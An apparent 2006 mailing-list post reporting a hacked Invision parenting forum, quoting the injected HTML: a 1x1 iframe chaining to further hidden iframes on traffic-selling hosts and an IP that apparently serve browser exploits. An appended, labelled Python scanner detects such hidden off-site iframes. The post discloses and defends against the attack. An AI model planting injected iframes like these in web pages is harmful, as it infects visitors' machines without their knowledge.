Message-ID: <OFC9C56928.6E31745F-ON85257145.0055E0D9-85257145.0055EC1A@metafore.ca>
Date: Mon Apr  3 16:38:39 2006
From: psmith at metafore.ca (psmith@...afore.ca)
Subject: Invisionzone.com board hacked...and Invision won't do a thing...


What is with irresponsible hosting companies?

I called Invision to report a hack where someone planted an iframe, which
is loading some exploits (wmf files and such). They will NOT do anything
unless the account holder calls in...so let's keep letting machines get
infected.

That is very irresponsible.

The site in question is http://september2002.invisionzone.com , (which is a
board my wife visits, other mothers with children born in September 2002)

Going there, you get:

<html>
<head>
<title>iframeCASH.biz</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<body>
<iframe src="http://www.doubleh.fr/audio/index.htm" width=1
height=1></iframe>
<b>IPB WARNING</b> [2] main(./sources/functions.php): failed to open
stream: No such file or directory (Line: 211 of /index.php)<br />
<b>IPB WARNING</b> [2] main(./sources/functions.php): failed to open
stream: No such file or directory (Line: 211 of /index.php)<br />

Of course, the index.htm at doubleh.fr , has the following content:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body>
<iframe src="http://traffdollars.biz/dl/adv553.php" width=1
height=1></iframe>
<iframe src="http://1-extreme.biz/traff.php?adv=35" width=1
height=1></iframe>
<iframe src='http://traff4all.biz/adv/174/new.php' width=1
height=1></iframe>
<iframe src="http://85.255.113.22/inc/nan49.html" width=1
height=1></iframe>
</body>
</html>

I didn't go beyond this, as I am ticked off from spending the last half an
hour trying to clean up after it.

However, Invision sure should have at least taken the URL to look at it.

Are all hosting companies like this? Very stupid.

I am not sure what it was trying to do, but it affected both Firefox and
MSIE. I have installed the latest SAV (04-02-2006) definitions and it
didn't say very much.

Thanks,

Paul

---------------------------------------------------
Paul W. Smith
Senior Network Operations Engineer
MCP, SCWSE, SCSA, SCNA, ACE, 3CSA, CNS, CLS, CLA, CRA, BCCA, JNCIA-FWV
Enterprise Services
Metafore IT Solutions
Direct: 905.362.7290
Cell: 416.271.6937
Toll Free: 800.563.7515 x 4086
psmith@...afore.ca
http://www.metafore.ca

M E T A F O R E
IT SOLUTIONS
----------------------------------------------------
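
Added example, not part of the original post: a site owner or host could scan served pages for the pattern shown above, an iframe sized to a pixel or so that loads from a different host than the board itself. The function names, the 2-pixel threshold and the sample hosts are assumptions made for illustration; the sample HTML is constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

def _px(value):
    """Integer pixel size, or None for missing, percentage or malformed values."""
    try:
        return int((value or "").strip().rstrip("px"))
    except ValueError:
        return None

class HiddenIframeFinder(HTMLParser):
    """Collect iframes that are effectively invisible and point off-site."""
    def __init__(self, page_host, max_px=2):  # max_px is an assumed threshold
        super().__init__()
        self.page_host, self.max_px, self.findings = page_host.lower(), max_px, []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        w, h = _px(a.get("width")), _px(a.get("height"))
        style = a.get("style", "").replace(" ", "").lower()
        tiny = (w is not None and w <= self.max_px) or (h is not None and h <= self.max_px)
        hidden = "display:none" in style or "visibility:hidden" in style
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        if (tiny or hidden) and host and host != self.page_host:
            self.findings.append((host, a.get("src", "")))

def find_hidden_iframes(html, page_host):
    """Return (host, src) for every hidden off-site iframe in html."""
    finder = HiddenIframeFinder(page_host)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample: attributes wrapped across lines and mixed quoting, as in
# the post; a same-host 1x1 frame and a normal-sized embed must not be flagged.
SAMPLE = """<html><body>
<iframe src="http://ads.example.test/dl/a.php" width=1
height=1></iframe>
<iframe src='http://203.0.113.7/inc/x.html' width=1
height=1></iframe>
<iframe src="http://board.example.test/chat.html" width=1 height=1></iframe>
<iframe src="http://video.example.test/embed" width=640 height=360></iframe>
<b>WARNING</b> failed to open stream"""

if __name__ == "__main__":
    for host, src in find_hidden_iframes(SAMPLE, "board.example.test"):
        print(f"hidden off-site iframe -> {host}  ({src})")
```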
